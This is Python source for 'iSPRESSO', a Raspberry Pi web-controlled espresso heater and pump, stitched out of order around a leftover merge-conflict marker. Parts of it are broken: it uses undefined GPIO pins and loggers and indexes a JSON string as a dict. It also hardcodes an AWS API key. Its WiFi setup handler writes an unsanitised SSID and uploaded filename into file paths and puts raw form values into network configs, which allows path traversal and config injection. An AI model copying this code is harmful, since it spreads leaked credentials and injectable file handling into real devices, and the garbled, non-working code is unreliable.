"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out
def POST(self):
pass
@staticmethod
def get_temp():
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out["temp"]
class echo:
def GET(self):
mystring = "{}"
try:
with open("echo.json") as f:
filecontents = json.load(f)
mystring = json.dumps(filecontents)
except (IOError, ValueError):
open("echo.json", 'a').close()
return render.echo(mystring) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
echoUserId = ""
try:
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "userId":
echoUserId = mydata[datalistkey]
logger.debug("Echo userId changing to " + str(mydata[datalistkey]))
with open("echo.json") as saveFile:
try:
my_settings = json.load(saveFile)
except ValueError:
my_settings = json.loads("{}")
my_settings['userId'] = echoUserId
logger.debug("Echo config updating: " + str(mydata))
with open("echo.json", "wb") as output_file:
json.dump(my_settings, output_file)
return json.dumps("OK")
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class settings:
def GET(self):
with open("settings.json") as f:
filecontents = json.load(f)
return render.settings(json.dumps(filecontents)) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "temp":
param.set_point = int(mydata[datalistkey])
logger.debug("temp changed to " + str(mydata[datalistkey]))
if datalistkey == "brewSecs":
mem.brew_time = int(mydata[datalistkey])
logger.debug("brew secs changed")
if datalistkey == "soakSecs":
mem.presoak_time = int(mydata[datalistkey])
logger.debug("soak secs changed")
if datalistkey == "waitSecs":
mem.wait_time = int(mydata[datalistkey])
logger.debug("wait secs changed")
logger.debug("Settings updated: " + str(mydata))
settings.save()
@staticmethod
def load():
with open("settings.json") as loadFile:
my_settings = json.load(loadFile)
mem.brew_time = my_settings["brewSecs"]
mem.presoak_time = my_settings["soakSecs"]
mem.wait_time = my_settings["waitSecs"]
param.set_point = my_settings["temp"]
param.k_param = my_settings["p_value"]
param.i_param = my_settings["i_value"]
param.d_param = my_settings["d_value"]
@staticmethod
def save():
with open("settings.json") as saveFile:
my_settings = json.load(saveFile)
my_settings['brewSecs'] = mem.brew_time
my_settings['soakSecs'] = mem.presoak_time
my_settings['waitSecs'] = mem.wait_time
my_settings['temp'] = param.set_point
my_settings['p_value'] = param.k_param
my_settings['i_value'] = param.i_param
my_settings['d_value'] = param.d_param
logger.debug("About to save settings = " + str(my_settings))
with open("settings.json", "wb") as output_file:
json.dump(my_settings, output_file)
class ispresso:
def GET(self):
return render.ispresso()
def POST(self):
op = ""
flag = ""
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "operation":
op = datalistkey[1]
if datalistkey[0] == "flag":
flag = datalistkey[1]
if str(op).upper() == "HEAT":
if flag == "on":
tellHeatProc("auto")
else:
tellHeatProc("off")
elif str(op).upper() == "PUMP":
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def brew(self):
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("called brew method ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def scheduled_mode(old_mode):
try:
now = datetime.now()
today = datetime.isoweekday(datetime.now())
if today == 7:
today = 0
if mem.cache_day is None or mem.cache_day != today: # refresh cache, reset flags, turn off heat
logger.debug("scheduled_mode: cache flush or new day. resetting flags, turning off heat.")
mem.cache_day = today
mem.sched_flag_off = False
mem.sched_flag_on = False
with open("schedule.json") as f:
my_schedule = json.load(f) # t= time.strptime("00:05:42.244", "%H:%M:%S")
mem.cache_start_time = my_schedule['days'][today]['time']['startTime']
mem.cache_start_time = now.replace(hour=int(mem.cache_start_time.split(":")[0]), minute=int(mem.cache_start_time.split(":")[1]))
mem.cache_end_time = my_schedule['days'][today]['time']['endTime']
mem.cache_end_time = now.replace(hour=int(mem.cache_end_time.split(":")[0]), minute=int(mem.cache_end_time.split(":")[1]))
return "off"
if now < mem.cache_start_time:
return old_mode
if now > mem.cache_start_time and now < mem.cache_end_time:
if mem.sched_flag_on:
return old_mode
else: # start flag NOT set
mem.sched_flag_on = True # set flag
logger.debug("scheduled_mode: going AUTO")
return "auto"
if now > mem.cache_end_time:
if mem.sched_flag_off:
return old_mode
else: # end flag NOT set
mem.sched_flag_off = True # set end flag
logger.debug("scheduled_mode: going OFF")
return "off"
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class setup:
def GET(self):
try:
mySsidList = setup.get_ssid_list()
return render.setup(mySsidList)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def POST(self): # catch the inputs, put them into a config file, then call a shell script
try:
input = web.input()
protocol = input.protocol
ssid = input.ssid
passwd = input.passwd
if protocol == "personal":
logger.debug("doing config for WPA personal. ssid = " + ssid)
with open('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = ' wpa-psk "' + passwd + '"\n'
if line.find("pre-up") > -1:
lines[idx] = ' # pre-up wpa_supplicant \n'
if line.find("post-down") > -1:
lines[idx] = ' # post-down # wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
elif protocol == "enterprise":
mycert = web.input(ca_cert={})
filename = ""
filedir = '/etc/certs/' # change this to the directory you want to store the file in.
if 'ca_cert' in mycert: # to check if the file-object is created
filepath = mycert.ca_cert.filename.replace('\\', '/') # replaces the windows-style slashes with linux ones.
filename = filepath.split('/')[-1] # splits the and chooses the last part (the filename with extension)
filename = filedir + filename # put together with my path
fout = open(filename, 'w') # creates the file where the uploaded file should be stored
fout.write(mycert.ca_cert.file.read()) # writes the uploaded file to the newly created file.
fout.close() # closes the file, upload complete.
logger.debug("SETUP: Enterprise - cert file written: " + filename)
with open ('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = '# wpa-psk \n' # commenting out the PSK line for Enterprise, we're going to do wpa-supplicant instead
if line.find("pre-up") > -1:
lines[idx] = ' pre-up wpa_supplicant -B -Dwext -i wlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -f /var/log/wpa_supplicant.log \n'
if line.find("post-down") > -1:
lines[idx] = ' post-down killall -q wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
with open ('/var/www/setup/wpa_supplicant.conf', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find(" ssid") > -1: # need the trailing space so it doesnt squash scan_ssid field
lines[idx] = ' ssid="' + ssid + '"\n'
if line.find("key_mgmt") > -1:
lines[idx] = ' key_mgmt=' + input.key_mgmt + '\n'
if line.find("pairwise") > -1:
lines[idx] = ' pairwise=' + input.pairwise + '\n'
if line.find("group") > -1:
lines[idx] = ' group=' + input.group + '\n'
if line.find("psk") > -1:
lines[idx] = ' psk="' + input.psk + '"\n'
if line.find("eap") > -1:
lines[idx] = ' eap=' + input.eap + '\n'
if line.find("identity") > -1:
lines[idx] = ' identity="' + input.identity + '"\n'
if line.find("password") > -1:
lines[idx] = ' password="' + passwd + '"\n'
if line.find("ca_cert=") > -1 : # need the trailing = so it doesn't squash ca_cert2 field
lines[idx] = ' ca_cert="' + filename + '"\n'
with open('/var/www/setup/ssid/' + ssid + '/wpa_supplicant.conf', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def get_ssid_list():
try:
iwlist_cmd = "iwlist wlan0 scanning | grep ESSID"
proc = subprocess.Popen(iwlist_cmd, shell=True, stdout=subprocess.PIPE)
myNwList = []
while True:
line = proc.stdout.readline()
if line != '':
line = line[line.find('"') + 1 : len(line) - 2]
myNwList.append(line)
else:
break
return myNwList
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def get_immediate_subdirectories(a_dir):
return [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name))]
@staticmethod
def check_connected(): # assumes we have a wifi configuration in place in /etc/network/interfaces and we want to test it
try:
url = "http://google.com"
response = requests.get(url)
return True
except:
pass
return False
@staticmethod
def wifi_connect():
try:
if setup.check_connected():
return True
my_ssid_list = setup.get_ssid_list()
my_subdir_list = setup.get_immediate_subdirectories("/var/www/setup/ssid/")
for ssid in my_ssid_list: # need to compare lists, and try out each one that matches
if ssid in my_subdir_list: # attempt connection - move file(s) into place, and recycle ifdown & ifup
logger.debug("wifi_connect: trying ssid = " + ssid)
shutil.copy2("/var/www/setup/ssid/" + ssid + "/interfaces", "/etc/network/interfaces")
if os.path.isfile("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf"):
shutil.copy2("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf", "/etc/wpa_supplicant/wpa_supplicant.conf")
my_cmd = "sudo ifdown wlan0 && sudo ifup wlan0"
proc = subprocess.Popen(my_cmd, shell=True, stdout=subprocess.PIPE)
if check_connected():
return True
return False
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def smart_connect():
logger.debug("Calling SmartConnect setup.sh")
subprocess.call("/var/www/setup/smartconnect.sh 2>&1 >> /var/log/smartconnect.log", shell=True)
class schedule:
def GET(self):
with open("schedule.json") as f:
filecontents = json.load(f)
return render.schedule(json.dumps(filecontents), str(datetime.now())) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
with open("schedule.json") as f:
my_schedule = json.load(f)
week = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3, 'Thursday':4, 'Friday':5, 'Saturday':6}
my_schedule['days'][week[mydata['day']]]['time']['startTime'] = mydata['time']['startTime']
my_schedule['days'][week[mydata['day']]]['time']['endTime'] = mydata['time']['endTime']
tellHeatProc(None, True) # FLUSH the cache so that the other process picks up the changes
with open("schedule.json", "wb") as output_file:
json.dump(my_schedule, output_file)
return json.dumps("OK")
def tempdata():
try:
one_wire = mem.one_wire # gets set below, on init "/sys/bus/w1/devices/28-000004e0badb/w1_slave"
pipe = Popen(["cat", one_wire], stdout=PIPE)
result = pipe.communicate()[0]
result_list = result.split("=")
try:
temp_C = float(result_list[-1]) / 1000 # temp in Celcius
except ValueError: # probably means we can't read the 1-wire sensor
# logger.warn('Could not get a value from 1-wire connector. Using ' + one_wire )
temp_C = 0
return temp_C
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def catchButton(btn): # GPIO
try:
time.sleep(0.05)
if GPIO.input(btn) != GPIO.HIGH: # check to see if the input button is still high, protect against EMI false positive
return
if (GPIO.input(gpio_btn_heat_sig) == GPIO.HIGH & GPIO.input(gpio_btn_pump_sig) == GPIO.HIGH): # both buttons pressed
mem.lcd_connection.send(["Live long", "and prosper!", 1]) # easter egg
mem.lcd_connection.send(["iSPRESSO", "", 0]) # easter egg
logger.info("You found an easter egg!")
return
if btn == gpio_btn_heat_sig:
now = time.time()
if now - mem.time_heat_button_pressed < 1:
mem.time_heat_button_pressed = now
return
mem.time_heat_button_pressed = now
if param.mode == "off":
GPIO.output(gpio_btn_heat_led, GPIO.HIGH) # this is a bit of a hack because the temp control also regulates the LED but putting it here gives better user experience.
logger.debug("catchButton: telling Heat Proc AUTO (ON) ")
tellHeatProc("auto")
else:
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
logger.debug("catchButton: telling Heat Proc OFF")
tellHeatProc("off")
elif btn == gpio_btn_pump_sig:
logger.debug("catchButton: telling Brew Proc (toggle)")
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
mem.brew_connection.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class logdisplay:
def GET(self):
fp = open('/var/log/ispresso.log', 'rU') # reading file from file path
text = fp.read() # no problem found till this line.
fp.close()
return render.logdisplay(text) # calling file_display.html
def cleanUp():
logger.info("Shutting down...")
mem.lcd_connection.send(["iSPRESSO", "Shutting down", 0])
execfile ('shutdown.py')
if __name__ == '__main__':
try:
logger_init()
os.chdir("/var/www")
call(["modprobe", "w1-gpio"])
call(["modprobe", "w1-therm"])
#call(["modprobe", "i2c-dev"])
base_dir = '/sys/bus/w1/devices/'
try:
base_dir = glob.glob(base_dir + '3b*')[0]
except:
logger.error("EPIC FAIL! 1-Wire Temp sensor not found in " + base_dir)
mem.one_wire = base_dir + '/w1_slave'
urls = ("/", "ispresso", "/settings", "settings", "/schedule", "schedule", "/advanced", "advanced", "/getstatus", "getstatus", "/logdisplay", "logdisplay", "/setup", "setup", "/echo", "echo")
render = web.template.render("/var/www/templates/")
app = web.application(urls, globals())
atexit.register(cleanUp)
statusQ = Queue(2)
parent_conn, child_conn = Pipe()
#lcd_parent_conn, lcd_child_conn = Pipe()
#mem.lcd_connection = lcd_parent_conn
initialize()
cloud_parent_conn, cloud_child_conn = Pipe()
mem.cloud_connection = cloud_parent_conn
brew_parent_conn, brew_child_conn = Pipe()
mem.brew_connection = brew_parent_conn
global_vars = globalvars()
GPIO.add_event_detect(gpio_btn_heat_sig, GPIO.RISING, callback=catchButton, bouncetime=250)
#GPIO.add_event_detect(gpio_btn_pump_sig, GPIO.RISING, callback=catchButton, bouncetime=250) # was RISING, at one point HIGH. who knows
mem.heat_connection = parent_conn
#lcdproc = Process(name="lcdControlProc", #target=lcdControlProc, args=(lcd_child_conn,))
#lcdproc.start()
brewproc = Process(name="brewControlProc", target=brewControlProc, args=(brew_child_conn,))
brewproc.start()
cloudproc = Process(name="cloudControlProc", target=cloudControlProc, args=(global_vars, brew_parent_conn,))
cloudproc.start()
p = Process(name="tempControlProc", target=tempControlProc, args=(global_vars, param.mode, param.cycle_time, param.duty_cycle, \
param.set_point, param.k_param, param.i_param, param.d_param, statusQ, child_conn))
p.start()
app.add_processor(add_global_hook(parent_conn, statusQ))
app.run()
except KeyboardInterrupt:
cleanUp()
sys.exit()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
cleanUp()
sys.exit()
if mem.scheduler_enabled: # if program is just been started, set the mode according to the schedule, assuming schedule is ON
tellHeatProc("auto")
=======
#!/usr/bin/python
# Copyright (c) 2013 Chris Synan & Dataworlds LLC
# Portions copyright (c) 2012 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The software is free for non-commercial uses. Commercial uses of this software
# or any derivative must obtain a license from Dataworlds LLC (Austin TX)
# In addition, the above copyright notice and this permission notice shall
# be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, time, shutil, logging, logging.handlers, traceback
import threading, subprocess, requests
import urllib3.contrib.pyopenssl
import multiprocessing
from multiprocessing import Process, Pipe, Queue, Value, current_process
from subprocess import Popen, PIPE, call, signal
from datetime import datetime
from shutil import copy2
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
import web, random, json, atexit
from pid import pidpy as PIDController
import RPi.GPIO as GPIO
import glob
# logging.basicConfig()
#logger = logging.getLogger('ispresso')
# REMOTE DEBUG -- TODO: Remove this before going to production
# import rpdb2
# rpdb2.start_embedded_debugger('funkymonkey', fAllowRemote = True)
gpio_heat = 12
gpio_btn_heat_led = 5
gpio_btn_heat_sig = 6
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_btn_heat_sig, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(gpio_heat, GPIO.OUT)
GPIO.setup(gpio_btn_heat_led, GPIO.OUT)
#def logger_init():
logger.setLevel(logging.DEBUG)
log_file_size = 1024 * 1024 * 1 # 1 MB
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(process)d - %(name)s : %(message)s')
fh = logging.handlers.RotatingFileHandler('/var/log/ispresso.log', maxBytes=log_file_size, backupCount=5)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('******************************************')
logger.info('Starting up...')
def initialize():
settings.load()
if setup.wifi_connect() == False: # this needs to happen after lcd pipe is set up
logger.warn("WiFi can't connect to internet. Entering Smart Connect mode. Connect to iSPRESSO wireless network.")
mem.lcd_connection.send(["iSPRESSO WiFi", "Access Point", 0])
setup.smart_connect()
else:
logger.info("WiFi connection looks ok")
mem.lcd_connection.send(["Coil King", "WiFi Connected", 3])
mem.lcd_connection.send(["Coil King", "", 0])
class mem: # global class
cache_day = None
cache_start_time = None
cache_end_time = None
heat_connection = Pipe()
#lcd_connection = Pipe()
brew_connection = Pipe()
cloud_connection = Pipe()
flag_pump_on = False
sched_flag_on = False
sched_flag_off = False
time_heat_button_pressed = time.time()
scheduler_enabled = True
presoak_time = 3
wait_time = 2
brew_time = 25
one_wire = None
class globalvars(object):
def __init__(self, initval = 0):
self.temperature = multiprocessing.Value("i", initval)
def set_temp(self, n=0):
with self.temperature.get_lock():
self.temperature.value = n
@property
def temp(self):
with self.temperature.get_lock():
return self.temperature.value
class param:
mode = "off"
cycle_time = 2.0
duty_cycle = 0.0
set_point = 640
k_param = 6 # was 6
i_param = 60 # was 120
d_param = 15 # was 5
def add_global_hook(parent_conn, statusQ):
# mem.heat_connection = parent_conn
g = web.storage({"parent_conn" : parent_conn, "statusQ" : statusQ})
def _wrapper(handler):
web.ctx.globals = g
return handler()
return _wrapper
class advanced:
def __init__(self):
self.mode = param.mode
self.cycle_time = param.cycle_time
self.duty_cycle = param.duty_cycle
self.set_point = param.set_point
self.k_param = param.k_param
self.i_param = param.i_param
self.d_param = param.d_param
def GET(self):
return render.advanced(self.mode, self.set_point, self.duty_cycle, self.cycle_time, self.k_param, self.i_param, self.d_param)
def POST(self):
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "mode":
self.mode = datalistkey[1]
if datalistkey[0] == "setpoint":
self.set_point = float(datalistkey[1])
if datalistkey[0] == "dutycycle":
self.duty_cycle = float(datalistkey[1])
if datalistkey[0] == "cycletime":
self.cycle_time = float(datalistkey[1])
if datalistkey[0] == "k":
self.k_param = float(datalistkey[1])
if datalistkey[0] == "i":
self.i_param = float(datalistkey[1])
if datalistkey[0] == "d":
self.d_param = float(datalistkey[1])
param.mode = self.mode
param.cycle_time = self.cycle_time
param.duty_cycle = self.duty_cycle
param.set_point = self.set_point
param.k_param = self.k_param
param.i_param = self.i_param
param.d_param = self.d_param
settings.save()
web.ctx.globals.parent_conn.send([self.mode, self.cycle_time, self.duty_cycle, self.set_point, self.k_param, self.i_param, self.d_param, False])
def gettempProc(global_vars, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("getTempProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
t = time.time()
time.sleep(0.5) # .1+~.83 = ~1.33 seconds
num = tempdata()
elapsed = "%.2f" % (time.time() - t)
conn.send([num, elapsed])
fah = (9.0 / 5.0) * num + 32
global_vars.set_temp(int(fah)) # convert to int before storing the global var
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def getonofftime(cycle_time, duty_cycle):
duty = duty_cycle / 100.0
on_time = cycle_time * (duty)
off_time = cycle_time * (1.0 - duty)
return [on_time, off_time]
def tellHeatProc(heat_mode=None, flush_cache=None):
if flush_cache is None:
flush_cache = False
if heat_mode is not None:
param.mode = heat_mode
mem.heat_connection.send([param.mode, param.cycle_time, param.duty_cycle, param.set_point, param.k_param, param.i_param, param.d_param, flush_cache])
def heatProc(cycle_time, duty_cycle, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("heatProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
while (conn.poll()): # get last
cycle_time, duty_cycle = conn.recv()
conn.send([cycle_time, duty_cycle])
if duty_cycle == 0:
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(cycle_time)
elif duty_cycle == 100:
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(cycle_time)
else:
on_time, off_time = getonofftime(cycle_time, duty_cycle)
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(on_time)
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(off_time)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def brewControlProc(brew_child_conn):
p = current_process()
logger = logging.getLogger("ispresso").getChild("brewControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
mem.flag_pump_on = False
button_bounce_threshold_secs = 1
while(True):
time_button_pushed, brew_plan = brew_child_conn.recv() # BLOCKS until something shows up
mem.flag_pump_on = True
for listitem in brew_plan:
if mem.flag_pump_on == False:
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
break
action = listitem[0]
duration = listitem[1]
counter = 0
start_time = time.time()
if action.upper() in ("PRESOAK", "BREW"):
GPIO.output(gpio_btn_pump_led, GPIO.HIGH)
GPIO.output(gpio_pump, GPIO.HIGH)
while ((counter < duration) & mem.flag_pump_on) : # might not need the check for flag_pump_on here, as its above
time.sleep(0.1)
if brew_child_conn.poll(): # mem.brew_connection.poll() returns TRUE or FALSE immediately and does NOT block
time_button_pushed_again, throwaway_brew_plan = brew_child_conn.recv() # get item off the list, check how long since time_button_pushed, against button_bounce_threshold_secs. If too short, clean up and exit this loop
if time_button_pushed_again - time_button_pushed > button_bounce_threshold_secs:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.flag_pump_on = False
mem.lcd_connection.send([None, "", 0])
break
if (time.time() - start_time) >= counter:
counter = counter + 1
message = action + 'ing ' + str(duration - counter) + 's'
mem.lcd_connection.send([None, message, 0])
logger.debug(message)
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.lcd_connection.send([None, '', 0])
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
finally:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
def cloudControlProc(global_vars, brew_conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("cloudControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
last_cmd_time = time.time()
secs_cmd_interval = 1.25
echoUserId = ""
# TODO: fetch userId from file on startup - also means we have to bounce the service when set from /echo POST
try:
with open("echo.json") as readFile:
my_settings = json.load(readFile)
echoUserId = my_settings["userId"]
except (IOError, ValueError):
logger.debug("Killing cloud process as we don't have a valid echoUserId")
return False # EXIT if we don't have a valid echoUserId - no sense racking up an AWS bill if we don't need to!
if not setup.check_connected():
logger.debug("Killing cloud process as we are not connected to internet")
return False # not going to keep this process running if we are not connected to internet.
if echoUserId == "":
logger.debug("Killing cloud process as we still don't have a valid echoUserId")
return False
logger.debug("Starting main loop with echoUserId = " + echoUserId)
while True:
time.sleep(0.1)
now_time = time.time()
if now_time - last_cmd_time > secs_cmd_interval:
last_cmd_time = now_time
try:
temp = global_vars.temp
url = 'https://ltqynxd6pc.execute-api.us-east-1.amazonaws.com/prod/ispresso-cloud-status-command' # post status to AWS, check for a command. Delete command from AWS. Execute command here
payload = {'echoUserId': echoUserId, 'temp': temp, 'temp_unit' : ' Fahrenheit'}
payload = json.dumps(payload)
headers = {'x-api-key': 'FqwN8fidPq7vvPTPcsOHd2V0BtAd17768Kq8UPM5'}
resp = requests.post(url, data=payload, headers=headers)
data = json.loads(resp.text)
if len(data.keys()) > 0: #[0] == "Item":
logger.debug("Received payload from AWS: " + str(data))
command = data["Item"]["command"]
currenttime = data["Item"]["currenttime"]
commandtime = data["Item"]["datetime"]
logger.debug("command = " + command)
if command == "brew":
# check to see if not too much time has passed from command to current time
min_diff = round((currenttime - commandtime) / 60000) ;
if min_diff > 1:
logger.error("Command is " + str(min_diff) + " minutes old! ")
else:
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
brew_conn.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def tempControlProc(global_vars, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param, statusQ, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("tempControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
parent_conn_temp, child_conn_temp = Pipe()
ptemp = Process(name="gettempProc", target=gettempProc, args=(global_vars, child_conn_temp,))
ptemp.daemon = True
ptemp.start()
parent_conn_heat, child_conn_heat = Pipe()
pheat = Process(name="heatProc", target=heatProc, args=(cycle_time, duty_cycle, child_conn_heat))
pheat.daemon = True
pheat.start()
pid = PIDController.pidpy(cycle_time, k_param, i_param, d_param) # init pid
flush_cache = False
last_temp_C = 0
while (True):
time.sleep(0.1)
readytemp = False
while parent_conn_temp.poll():
temp_C, elapsed = parent_conn_temp.recv() # non blocking receive
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off -- MOVING THIS as the OFF doesnt seem to fire..
if temp_C > 0: # the 1-wire sensor sometimes comes back with 0 -- need to fix that by holding on to last value.
last_temp_C = temp_C
else:
temp_C = last_temp_C
temp_F = (9.0 / 5.0) * temp_C + 32
temp_C_str = "%3.2f" % temp_C
temp_F_str = "%3.2f" % temp_F
temp_F_pretty = "%3.0f" % temp_F
mem.lcd_connection.send(['Coil King ' + str(temp_F_pretty) + ' F', None, 0])
readytemp = True
if readytemp == True:
if mode == "auto":
duty_cycle = pid.calcPID_reg4(temp_F, set_point, True)
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.HIGH)
elif mode == "off":
duty_cycle = 0
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
if (not statusQ.full()):
statusQ.put([temp_F_str, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param]) # GET request
readytemp == False
while parent_conn_heat.poll(): # non blocking receive
cycle_time, duty_cycle = parent_conn_heat.recv()
while conn.poll(): # POST settings
mode, cycle_time, duty_cycle_temp, set_point, k_param, i_param, d_param, flush_cache = conn.recv()
if flush_cache:
mem.cache_day = None # this should force cache flush
flush_cache = False
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class getstatus:
def __init__(self):
pass
